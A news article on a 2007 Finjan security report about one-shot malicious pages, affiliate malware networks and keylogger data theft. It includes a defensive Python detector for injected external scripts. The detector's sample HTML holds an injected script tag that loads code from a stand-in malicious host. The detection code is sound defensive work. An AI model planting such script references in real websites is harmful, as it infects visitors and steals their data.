A new report details the current generation of threats to web security.
Finjan, which describes itself as a pro-active Web security and anti-spam specialist, has released its Q2 2007 IT security trends report.
The report details some interesting types of attacks designed to bypass signature-based and database-reliant IT security technology.
The report also details the proliferation of affiliation networks based on a ‘hosted model’ for malicious code, which use off-the-shelf malicious code packages to compromise popular web sites.
The last major discovery on the malware and hacker attack front from Finjan was last year, when the company revealed hackers were starting to use code obfuscation (hiding) techniques to prevent their malware from being discovered.
These techniques even stretched to storing the malware and/or infected code on a cached server, such as Google’s Webcache, meaning that conventional URL filters could not spot the malware, and allowed hapless web users to load up the infected pages without question.
But now it gets worse, as Finjan has discovered that hackers are keeping track of the actual IP addresses of visitors to a particular site or web page.
Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address.
Put simply, this means that the second time an IP address tries to access the malicious page, a benign page will be loaded in its place, causing all traces of the original infected pages to disappear.
According to the report, hackers are also being motivated by commercial greed, locating infected pages on a dedicated malicious code server and then offering affiliate codes - which are added to the web site URL - to third-party hackers.
These third-party hackers are then paid commissions according to the number of infected visitors to the main site.
Basically, hackers are being rewarded for driving traffic by fair means or foul (and usually the latter) to a malware-laden web site.
For the master hackers involved in these types of scams, the rewards are potentially quite high, as the infected pages load key logging and other site logging programs to the hackee’s PC.
The hackee’s PC then drip-feeds personal data such as bank account log-in details and credit card details back to a web storage site, from which the hackers harvest data for fraudulent usage.
According to Yuval Ben-Itzhak, Finjan’s CTO, the problem with these types of attacks is that a growing number of sites are being hit by them stealthily.
These attacks, he says, leave no visible damage and simply insert a line of HTML code that points to malicious code on an external server.
“The upshot is that any visitor to such a site may be jeopardising his/her personal identity, bank account details and credit card numbers to the criminals behind these operations,” he explained.
As you might expect, Ben-Itzhak is keen to promote Finjan’s IT security technology, but he does note - quite correctly - that businesses that rely solely on signature-based anti-virus or URL filtering technology may be left vulnerable to these types of attacks.
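The two behaviours described above, the injected line of HTML pointing at an external server and the one-view-per-IP serving that makes it vanish on a second visit, can be checked for from the defender's side. The following is an added illustration, not Finjan's code or anything from the report; the two HTML samples and the host name malicious-code-server.example are constructed, and the site host www.example.com is assumed.

```python
"""Flag external <script>/<iframe> sources in a page and detect
'one-shot' serving: an injected reference present on the first fetch
but absent when the same IP fetches the page again."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _RefCollector(HTMLParser):
    """Collect src attributes of <script> and <iframe> tags."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            for name, value in attrs:
                if name == "src" and value:
                    self.refs.append(value)


def external_refs(html, site_host):
    """Return hosts of script/iframe sources not served by site_host."""
    parser = _RefCollector()
    parser.feed(html)
    hosts = {urlparse(r).hostname for r in parser.refs}
    return sorted(h for h in hosts if h and h != site_host)


def differential_serving(first_html, second_html, site_host):
    """External hosts seen on the first fetch but gone on the re-fetch.
    A non-empty result matches the one-view-per-IP behaviour: the first
    observation is the only evidence, so log it rather than re-check."""
    first = set(external_refs(first_html, site_host))
    second = set(external_refs(second_html, site_host))
    return sorted(first - second)


# Constructed samples: the compromised page with the injected line, and
# the benign page the same IP receives on its second visit.
FIRST_VISIT = """<html><body><h1>Welcome</h1>
<script src="/js/site.js"></script>
<script src="http://malicious-code-server.example/pack.js?aff=1234"></script>
</body></html>"""
SECOND_VISIT = """<html><body><h1>Welcome</h1>
<script src="/js/site.js"></script>
</body></html>"""

if __name__ == "__main__":
    print(external_refs(FIRST_VISIT, "www.example.com"))
    print(differential_serving(FIRST_VISIT, SECOND_VISIT, "www.example.com"))
```

A crawler that only keeps its latest fetch of each page would record the benign version and lose the injection; retaining the first observation is what makes the comparison possible.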
Against this backdrop, Finjan offers the following advice for business users of IT security technology:
1. Make sure that real-time inspection and protection is added to your web security solution. Chasing the attack vectors after the event is always ‘too little, too late’, particularly if you get hit by a zero-day attack that your security solution does not recognise.
2. Make sure that your IT security technology is updated to handle new technologies and trends. Security products should protect you from the vulnerabilities rather than just attacks and exploits.
3. Check your vendor’s research capabilities and its ability to provide up-to-date information which is immediately translated into actionable security measures.
4. Examine your egress data policy to make sure that you cover all known and suspicious sites.